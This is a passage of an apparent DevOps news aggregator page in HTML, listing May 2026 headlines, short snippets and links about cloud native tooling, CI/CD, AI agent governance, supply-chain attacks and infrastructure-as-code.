<p><strong>📅 May 12, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/back-up-and-restore-your-amazon-eks-cluster-resources-using-velero/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cloud-native"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-custom-mcp-catalogs-and-profiles-advancing-enterprise-mcp-adoption" class="group relative scroll-mt-24">
        <a href="#h3-custom-mcp-catalogs-and-profiles-advancing-enterprise-mcp-adoption" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Custom MCP Catalogs and Profiles: Advancing Enterprise MCP Adoption
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-custom-mcp-catalogs-and-profiles-advancing-enterprise-mcp-adoption"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We’re excited to announce the general availability of Custom Catalogs and Profiles for managing Model Context Protocol (MCP) servers. These two complementary capabilities fundamentally change how team</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/create-custom-mcp-catalogs-and-profiles/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-extending-ai-gateways-with-rust-custom-transformations-in-agentgateway-and-kgateway" class="group relative scroll-mt-24">
        <a href="#h3-extending-ai-gateways-with-rust-custom-transformations-in-agentgateway-and-kgateway" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Extending AI gateways with Rust: Custom transformations in agentgateway and kgateway
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-extending-ai-gateways-with-rust-custom-transformations-in-agentgateway-and-kgateway"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Every gateway ships with a set of built-in policies. Authentication. Rate limiting. Request routing. Prompt guards. These cover most use cases. But what about the ones they don’t cover? What if you ne</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/15/extending-ai-gateways-with-rust-custom-transformations-in-agentgateway-and-kgateway/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-counting-to-3-with-a-new-builder-processing-50m-monthly-builds" class="group relative scroll-mt-24">
        <a href="#h3-counting-to-3-with-a-new-builder-processing-50m-monthly-builds" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Counting to 3 with a new builder processing 50M+ monthly builds
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-counting-to-3-with-a-new-builder-processing-50m-monthly-builds"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We replaced our Docker-buildx GCP autoscaler with a fleet of microVM build cells running BuildKit. Here&#39;s what we learned rolling it out.</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Railway Blog</strong></p>
<p><a href="https://blog.railway.com/p/new-builder-scale-big"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-nist-narrows-the-nvd-what-container-security-programs-should-reassess" class="group relative scroll-mt-24">
        <a href="#h3-nist-narrows-the-nvd-what-container-security-programs-should-reassess" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 NIST Narrows the NVD: What Container Security Programs Should Reassess
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-nist-narrows-the-nvd-what-container-security-programs-should-reassess"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>On April 15, NIST announced a prioritized enrichment model for the National Vulnerability Database. Most CVEs will still be published, but fewer will receive the CVSS scores, CPE mappings, and CWE cla</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/nist-narrows-the-nvd-what-container-security-programs-should-reassess/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-docker-ai-governance-unlock-agent-autonomy-safely" class="group relative scroll-mt-24">
        <a href="#h3-docker-ai-governance-unlock-agent-autonomy-safely" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Docker AI Governance: Unlock Agent Autonomy, Safely
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-docker-ai-governance-unlock-agent-autonomy-safely"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Introducing Docker AI Governance: centralized control over how agents execute, what they can reach on the network, which credentials they can use, and which MCP tools they can call, so every developer</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/docker-ai-governance-unlock-agent-autonomy-safely/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-implement-centralized-observability-for-multi-account-amazon-eks" class="group relative scroll-mt-24">
        <a href="#h3-implement-centralized-observability-for-multi-account-amazon-eks" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Implement centralized observability for multi-account Amazon EKS
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-implement-centralized-observability-for-multi-account-amazon-eks"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This post shows you how to unify your existing Container Insights and CloudWatch data into a centralized monitoring hub using a hub-and-spoke architecture. You will unify fragmented observability data</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/implement-centralized-observability-for-multi-account-amazon-eks/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cicd"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-gitlab-act-2-still-an-open-book" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-act-2-still-an-open-book" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab Act 2: Still an Open Book
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gitlab-act-2-still-an-open-book"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>An analysis of GitLab’s &quot;Act 2&quot; transition under CEO Bill Staples, examining whether the company can successfully pivot to an AI-native, agentic software delivery model while dismantling the radically</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/gitlab-act-2-still-an-open-book/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-core-java-vs-enterprise-java-jakarta-ee-spring-boot-2026" class="group relative scroll-mt-24">
        <a href="#h3-core-java-vs-enterprise-java-jakarta-ee-spring-boot-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Core Java vs Enterprise Java: Jakarta EE & Spring Boot 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-core-java-vs-enterprise-java-jakarta-ee-spring-boot-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Java SE, Jakarta EE, and Spring Boot have converged more than most teams realize. A 2026 guide to choosing — and standardizing — your enterprise Java stack. | Blog</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/jakarta-ee-vs-spring-boot"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-a-context-graph-actually-is-and-how-to-build-one" class="group relative scroll-mt-24">
        <a href="#h3-what-a-context-graph-actually-is-and-how-to-build-one" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What a Context Graph Actually Is, and How to Build One
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-a-context-graph-actually-is-and-how-to-build-one"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Context graphs help AI agents reason through work by modeling how processes actually happen across your organization. This practical guide breaks down what they are, how they differ from knowledge gra</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/what-a-context-graph-actually-is-and-how-to-build-one"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-building-a-general-purpose-accessibility-agentand-what-we-learned-in-the-process" class="group relative scroll-mt-24">
        <a href="#h3-building-a-general-purpose-accessibility-agentand-what-we-learned-in-the-process" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Building a general-purpose accessibility agent—and what we learned in the process
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-building-a-general-purpose-accessibility-agentand-what-we-learned-in-the-process"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn about the experimental general-purpose accessibility agent that GitHub is piloting. The post Building a general-purpose accessibility agent—and what we learned in the process appeared first on T</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/github-copilot/building-a-general-purpose-accessibility-agent-and-what-we-learned-in-the-process/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-widespread-mini-shai-hulud-campaign-is-a-matter-of-trust" class="group relative scroll-mt-24">
        <a href="#h3-widespread-mini-shai-hulud-campaign-is-a-matter-of-trust" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Widespread Mini Shai-Hulud Campaign Is a Matter of Trust
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-widespread-mini-shai-hulud-campaign-is-a-matter-of-trust"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The latest series of attacks using the notorious Shai-Hulud worm puts into sharp focus the threats facing software developers and their CI/CD pipelines, an issue that has been raised in recent months </p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/widespread-mini-shai-hulud-campaign-is-a-matter-of-trust/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-raising-the-bar-quality-shared-responsibility-and-the-future-of-githubs-bug-bounty-program" class="group relative scroll-mt-24">
        <a href="#h3-raising-the-bar-quality-shared-responsibility-and-the-future-of-githubs-bug-bounty-program" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Raising the bar: Quality, shared responsibility, and the future of GitHub’s bug bounty program
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-raising-the-bar-quality-shared-responsibility-and-the-future-of-githubs-bug-bounty-program"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We&#39;re updating our bug bounty program standards to prioritize quality submissions, clarify shared responsibility boundaries, and evolve how we reward low-risk findings. The post Raising the bar: Quali</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/security/raising-the-bar-quality-shared-responsibility-and-the-future-of-githubs-bug-bounty-program/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-availability-report-april-2026" class="group relative scroll-mt-24">
        <a href="#h3-github-availability-report-april-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub availability report: April 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-github-availability-report-april-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In April, we experienced 10 incidents that resulted in degraded performance across GitHub services. The post GitHub availability report: April 2026 appeared first on The GitHub Blog.</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/news-insights/company-news/github-availability-report-april-2026/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-latency-to-instant-modernizing-github-issues-navigation-performance" class="group relative scroll-mt-24">
        <a href="#h3-from-latency-to-instant-modernizing-github-issues-navigation-performance" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From latency to instant: Modernizing GitHub Issues navigation performance
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-from-latency-to-instant-modernizing-github-issues-navigation-performance"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>How the GitHub Issues team used client-side caching, smart prefetching, and service workers to make navigation feel instant. The post From latency to instant: Modernizing GitHub Issues navigation perf</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/engineering/architecture-optimization/from-latency-to-instant-modernizing-github-issues-navigation-performance/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-automated-release-management-from-cabs-to-cd" class="group relative scroll-mt-24">
        <a href="#h3-automated-release-management-from-cabs-to-cd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Automated Release Management: From CABs to CD
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-automated-release-management-from-cabs-to-cd"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Find out how policy-driven pipelines, continuous delivery and AI-assisted verification are replacing manual CAB processes with automated release management. | Blog</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/automated-release-management-from-cabs-to-continuous-delivery"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-harden-your-pipeline-perimeter-for-the-era-of-ai-assisted-coding" class="group relative scroll-mt-24">
        <a href="#h3-harden-your-pipeline-perimeter-for-the-era-of-ai-assisted-coding" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Harden your pipeline perimeter for the era of AI-assisted coding
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-harden-your-pipeline-perimeter-for-the-era-of-ai-assisted-coding"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI-assisted development is moving faster than the security models built to govern it — agents write code, open merge requests, and ship changes at a pace where vulnerabilities go unnoticed. The proble</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/harden-pipeline-perimeter-for-ai-assisted-coding/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-patch-release-18113-18106-1897" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-patch-release-18113-18106-1897" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab Patch Release: 18.11.3, 18.10.6, 18.9.7
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gitlab-patch-release-18113-18106-1897"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p><strong>📅 May 13, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://docs.gitlab.com/releases/patches/patch-release-gitlab-18-11-3-released/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-iac"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-ensure-code-integrity-for-aws-lambda-functions-with-automated-code-signing-using-terraform" class="group relative scroll-mt-24">
        <a href="#h3-ensure-code-integrity-for-aws-lambda-functions-with-automated-code-signing-using-terraform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Ensure Code Integrity for AWS Lambda Functions with Automated Code Signing Using Terraform
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ensure-code-integrity-for-aws-lambda-functions-with-automated-code-signing-using-terraform"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Authors: Sourav Kundu and Joyson Neville Lewis. In today’s cloud-native landscape, ensuring the integrity and authenticity of your serverless functions is critical for maintaining security and complia</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/ensure-code-integrity-for-aws-lambda-functions-with-automated-code-signing-using-terraform/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-cloudwatch-logs-announces-increased-query-result-limits" class="group relative scroll-mt-24">
        <a href="#h3-amazon-cloudwatch-logs-announces-increased-query-result-limits" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon CloudWatch Logs announces increased query result limits
        </a>
        <button 
